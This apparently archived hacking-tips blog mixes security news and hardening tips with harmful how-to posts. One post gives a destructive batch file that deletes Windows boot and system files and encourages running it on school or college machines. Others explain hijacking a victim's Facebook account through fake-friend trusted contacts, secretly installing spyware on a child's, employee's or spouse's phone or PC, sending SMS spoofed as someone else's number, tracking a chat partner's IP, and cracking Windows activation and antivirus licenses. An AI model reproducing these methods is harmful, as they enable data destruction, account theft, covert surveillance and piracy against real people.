Pages under Cyber Attack after releasing U.S. diplomatic cables


The WikiLeaks website, which contains thousands of U.S. embassy cables, has crashed in an apparent cyberattack. The anti-secrecy organization said in a Twitter message Tuesday that "is presently under attack." today released 250,000 U.S. diplomatic cables that have apparently caused grave concern in Western governments. The documents have already revealed that the U.S. has been spying on the United Nations Secretary General. State Department spokeswoman Victoria Nuland would not confirm the authenticity of the latest documents, but said "the United States strongly condemns any illegal disclosure of classified information."

Source: Thehackernews

Qubes OS : An Operating System Designed For Security


Qubes is an open source operating system designed to provide strong security for desktop computing. Qubes is based on Xen, X Window System, and Linux, and can run most Linux applications and utilize most of the Linux drivers. In the future it might also run Windows apps.
Key architecture features:

  • Based on a secure bare-metal hypervisor (Xen)
  • Networking code sand-boxed in an unprivileged VM (using IOMMU/VT-d)
  • No networking code in the privileged domain (dom0)
  • All user applications run in “AppVMs”, lightweight VMs based on Linux
  • Centralized updates of all AppVMs based on the same template
  • Qubes GUI virtualization presents applications like if they were running locally
  • Qubes GUI provides isolation between apps sharing the same desktop
  • Storage drivers and backends sand-boxed in an unprivileged virtual machine(*)
  • Secure system boot based on Intel TXT(*)

Source: Thehackernews

Send unlimited fake Email by 100+ subdomain email address


Today,i am going tell you how you send unlimited email by different sub domain name.

Sub domain like...

and more than 100+

But remember when you Signup then enter fake country name and do not enter any Contact Email address.

Click Here

If u like it write your view below box.

How to use Telnet With Windows XP (For Newbie)


The queen of hacker commands is telnet.Telnet is a remote logging command which inbuild with command prompt in Windows Operating System.

For use Telnet,first open the command prompt.For this press Windows Key+R Key you see RUN platform open,here write ‘cmd’ and press OK.Command prompt will be open.Here type


Here’s what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host
-a Attempt automatic logon. Same as -l option except uses
the currently logged on user's name.
-e Escape character to enter telnet client prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system.
Requires that the remote system support the TELNET ENVIRON
-t Specifies terminal type.
Supported term types are vt100, vt52, ansi and vtnt only.
host Specifies the hostname or IP address of the remote computer
to connect to.

port Specifies a port number or service name.

For Newbie: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer.

Telnet is a remote logging command so it is use for log into a remote computer.

Every day people complaining they can't telnet. That is usually because they try to telnet into a computer, or a port on a computer that is set up to refuse telnet connections. Here's what it might look like when a computer refuses a telnet connection:

C:\hrde >telnet

Connecting To not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

Or you also see:

C:\hrde >telnet

Connecting To not open connection to the host, on port 23.
No connection could be made because the target machine actively
refused it.

If you just give the telnet command without giving a port number, it
will automatically try to connect on port 23, which sometimes runs a
telnet server.

So firstly found the IP address of the Victim and use ‘Port Tracer’ tool for trace the open Port on victim System.Many tool are available on internet you got it by search on Google Uncle.

After that run according to shown below…

C:\hrde>telnet ip-address port-number

And press ENTER key.

If telnet failed to connect, possibly the computer you were trying to
telnet into was down or just plain no longer in existence. Maybe the
people who run that computer don't want you to telnet into it.

8 More Important Security Enhancements


1. Check Windows Update and Office Update regularly (; Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate ( and ZoneAlarm ( offer free versions.

3. Install a free spyware blocker. I am choose SpyBot Search & Destroy ( SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages by disabling the Windows Messenger service.
Open Control Panel >> Administrative Tools >> Services and you'll see Messenger
Right-click and go to Properties, Set Start-up Type to Disabled and press the Stop button. Bye spam pop-ups!

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol.

6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you're not willing to pay, try AVG Free Edition

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get.

Hack by SniperSpy


SniperSpy remote spyware silently logs all web sites, chat conversations, instant messages, keystrokes, applications and more in real time. See everything your child, employee or anyone does while they use your distant computer - remotely.

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. No physical access to the remote PC is needed to install the spy software. Once installed it records chat conversations, web sites and more.

This software remotely installs to your computer through email. Unlike the other remote spyware titles on the market, Sniper Spy fully and completely bypasses the Windows XP Firewall.

The program then records user activities and sends the data to your online control panel. You login to your control panel to view spy results using your own password-protected account.

For get trial click here

For get free click here



JonDoFox is a profile for the Mozilla Firefox web browser particularly optimized for anonymous and secure web surfing. For anonymous surfing you need an IP changer proxy too. We recommended you proxy tool JonDo.

It is a great tool,it hide you with browser ,if any third party person track you then it find your IP address same to all other IP person whose use JonDoFox and it see you connected with multiple Server on net so he is not found your server on internet.

I am use this tool,and below show a picture which that shown you my Real IP address on DOS Prompt,my IP set by Jondofox and in my blog HACKARDE you see my fake IP which set by JonDoFox.

JonDoFox available for Windows,Mac OS and also for Linux OS.

For Download JonDoFox click here

Download Mozilla Firefox v6.0


In under two month Mozilla Launch another major version update for Firefox.

It much fast and good looking with new address bar which show the domain of the site.

It is help full in finding the Phishing page of social networking site,So go to Firefox official website and download it.

For go to download link click here

Send SMS to victim by any Cell number also send by victim Cell number


Hey you read right,today i am tell how you send the SMS to a person by any number also his Cell number,i am not kidding.
For example: Send a SMS to a girl by your friend Cell number,you know what i am say.

For this go to a website which help you click here

Register yourself on SMSglobal but before register, i am tell you a trick.

SMSglobal allow only 25 instant credits for free user means you only send 25 SMS but i am tell you a trick by which you found 125 credits means 125 free SMS for send globally.

When you fill the registration foam,you see a blank space for PROMO CODE here you write the" WPRESS " like given below...

you only fill the...
1: Username
2: Account type---> Personal
3: Complete Contact Information:: Please write right Mobile Number because Website send you password of the account.Do not add personal address.
4: Write Promo Code "WPRESS".Accept terms and condition and fill Verification Code.

You found 125 free SMS for send Globally by any Number.

I think this is the best threads on SMS hacking.And it also work does not like other SMS service.

If you really like it please given your good comment.

Online satellite Cell phone tracing


Today,Mobile Spy is a hot topic,every one want to know about the location ,SMS,call and private point of other person.

Mobile spy is very help full for spy the wife and children's cell phone.

I am tell you a site by which you spy all above write thing by online satellite.For it click here

Here you make a account and install the software on cell phone of victim.Go to site open your account and see GPS location,call and SMS detail of your victim.



I am going to tell you how you make a undetectable Batch Virus which delete the important file of your Operating System.
Batch program is a feature of Windows Operating System.Batch programing is a text on notepad which works as a Command in the Windows Operating System.

1: Open notepad and copy paste below write lines...
del boot
del autoexec.bat
del bootmgr
del config.sys
del pagefile.sys
shutdown -r -c "you had been infected by me you go to dad!!!!"

2: Save as by killer.bat

3: Do not run this virus on your system,copy paste and use in collage or school system.

The Complete Windows 7 Shortcuts eBook


This ebook under contain 200 keyboard shortcuts for Windows operating system lover.

The book has been written by Mr.Nitin Agarwal, he is an independent technology analyst for Windows IT Pro and Microsoft products.

This ebook free and published by .

The eBook is pretty exhaustive and the topics covered include:

  • What is Keyboard & how to use it?
  • How keys are organized on a standard Keyboard
  • Typing & editing the text using Keyboard
  • Using Keyboard Shortcuts
  • Find program shortcuts
  • Choose menus, commands, and options
  • Some useful shortcuts
  • Using the keyboard extras
  • Using navigation keys
  • Using the numeric keypad
  • Three odd keys
  • Use your keyboard safely
  • Create keyboard shortcuts to open programs
  • Make the keyboard easier to use
  • Type without using the keyboard (On-Screen Keyboard)
  • Set On-Screen Keyboard to use for various handy tasks
  • The Shortcuts Collection
  • General Windows functions keyboard shortcuts
  • Dialog box keyboard shortcuts
  • Windows logo key keyboard shortcuts
  • Windows Explorer keyboard shortcuts
  • Ease of Access keyboard shortcuts
  • Magnifier keyboard shortcuts
  • Remote Desktop Connection keyboard shortcuts
  • Keyboard shortcuts for MS Paint
  • Keyboard shortcuts for WordPad
  • Keyboard shortcuts for Calculator
  • Windows Journal keyboard shortcuts
  • Windows Help viewer keyboard shortcuts
  • Windows Media Player keyboard shortcuts
  • Internet Explorer keyboard shortcuts
  • Windows Media Center keyboard shortcuts.

For download the ebook click here

Hide Windows Partition Without Software


I am going tell a trick by which you hide your Windows hard disk partition without any use of software.
For this trick I am use the MS DOS (Command Prompt).Microsoft make the MS DOS for Command Line Instruction.I think every person whose that use the Windows know very well about Command Prompt.
If we say about hackers,Windows registry(regedit) and MS DOS always favourite features in Windows.
So.I am again use the MS DOS for hide the Windows Drive .

1: Go to 'RUN' and type 'cmd' by which command prompt open. Type 'Diskpart' and press ENTER key like given below...

By doing it Diskpart come into Global Configuration Mode.

2: Type 'list volume' like given below...

By this you see all present partion of the Windows.

3:Type 'select volume _' in blank space you fill the partion drive alphabet which you want hide.For example i am choose the partion 'E' like given below...

You see a astrix in front of choose partion which means your selection lock.

4: Type 'remove letter _' fill the blank space with selected partion alphabet,In my case i am write 'E' like given below picture...

After press Enter Key you see message of successfully remove drive, given next command
'list volume' and it shown the hide partion like above picture.You go to MyComputer and see the hide drive.

5: For found the hide partion type 'assign letter _' in place of blank type the choose partition alphabat and press Enter Key,in my case i am write 'E' like given below...

Go to MyComputer and see again.

Hack Victim Facebook Account By His Friend List


I am going to tell you,how you can hack the victim Facebook account by his friend list.For this trick it is necessary you have already 3 fake facebook account.
First work,add 3 fake facebook account with victim facebook's friend list by sending friend request to victim,all person know how to add with a person in facebook.

When your all fake id add with victim then go to sign in page of the facebook,here you see a option 'Forget the Password?' click in,you see a window open like given below...

Enter the victim account id address and click in search option.You see a new window like given below...

In above picture you see a option 'No longer have access to these?' click it,then a new window open in which Facebook ask new email address ,here you enter a wrong email address and continue like given below...

After above work it also ask some security question but you given the wrong answer 3 times,you see a new window open like given below...

Click continue and select 3 friend from the list,this 3 friend who are ? you know very well.
Facebook send the security code to all select friend list ID,means it come to you,in step 3 enter the code and recover the account.

This post writes only for viewer knowledge,don't use it for any hacking activities,in place of hacking increase your account security and add some unknown friend in your friend list.

Also given your good comment.

AOL Postmaster Website hacked by HODLUM


AOL’ website was hacked Saturday afternoon by someone who goes by the name “HodLuM.” The site was slightly defaced with a message from the hacker. “AOL S3RV3RZ ROOT3D BY HODLUM LOLZ!,” the message read.

AOL finally discovered the hack, and fixed the page between two and four hours after evidence of the breach was posted to The various forums where this hack was posted all included various jokes along the lines of, “AOL still exists?!” Ouch…

The AOL Postermaster blog has so far not responded to the hack. The hack of AOL Postmaster comes at the end of a difficult week for AOL. While the hack of a minor AOL web property has nothing to do with the poor performance of its stock, the incident can only serve to worsen the mood at a company that’s struggling to stay upright.

Surf internet anonymously


Today,I am going to tell you how we are surfing the internet anonymously.

Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Hide My IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button.

For download Hide My IP click here

Install it,when you start the Hide My IP then it shown your real IP address but when you click on the 'Hide My IP' button then it start working and change your IP address with country.

For stop it click on the 'Stop Hiding IP' button.

Genuine your Windows for latest update


Today,i am going to tell you how to genuine your unregistered windows OS,by which you found the latest update from Microsoft and enhance the security and other features of the Windows.
This work for the Windows Vista and 7 .
For download the tool click here

Open the tool you see a window like given below...

Click on the 'Select Task' and you see the new window like given below...

Go to 'Please Select' option and choose your any brand name.

After that Click on the "Activate slic Present" and Wait after some time a new window open just choose anything.

After doing that click on 'Install information 32bit' or 'Install information 64bit' according to your operating system.

Now click 'Hazar option 2' after some time a option come for restart your computer ,then reboot your system.

Go to MyComputer property and check,your OS done genuine.

Don't display the last user who logged in the windows


When you use the ctrl+alt+del button ,it will show the name of the user who logged in most recently .It create some problem if multiple user use a system because their own password in associate with another user's login name.If another person try then it lock the other user out.

You solve this problem by registry edit by which Windows not to display the name of the user who was logged in previously:

1: Go to run and type 'regedit' and press ok.

2: Registry window open in the screen,then follow path...


3: See at right side some option come in which write ' Dontdisplaylastname ' double click on this and change its value to 1.

Hack and find the IP address of the chat buddy


In hacking ,IP address of the victim is most important to do any hacking activities with victim system,but question come how to know the IP of the victim at online timing.Today i am going to tell you how to know the IP address of the victim with chating in chat box.
By this method you also know the victim location mean his country ,city and local time.

Chatrack is a website which provide the facility to track the victim IP address and geographical position. For going the site plz click below and free sign up...

After sign up sign in on the website and go to Track Codes option which shown below...

Here chose a picture and click on the picture...

A new tab open like given pic in last with a source code.

Copy the source code and paste in the chat box and say to the victim for click on the link ,when victim click on the link then he see a picture which chose by you and tracking start after 20 second go to chatrack and open the Track Result option shown in above pic,you got all information of the victim.

please given your good comment.

Security Software That Can Detect And Kill Hidden Trojan Virus And Keylogger


In your system some times many harm full program run like keylogger ,virus and trojan which are hidden and you do not capable to remove it, So today i am going to introduce you with a software which remove all the hidden harm full program from your system and increase the security of your computer system.

Process Revealer

This software launch by LOGIXOFT. Process Revealer is a free security software that can detect and kill hidden processes.
Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.

For Download Process Revealer Click Here

Make avg_antivirus_2011 License


AVG Anti-virus is a good software which that protect your system by virus,malware and spam.
You download this anti-virus from here

And instal it.

But you see this Anti-virus is a trial virson and allow you for use only 1 month .For making it license version ,we given you a serial number by which you register your trail version and valid it upto 2018. Serial number given below...

Related Posts Plugin for WordPress, Blogger...

Hackarde's Search Engine- Search Hacking Tutorial,Tool and eBook

HACKARDE © 2011 | Designed by HrDe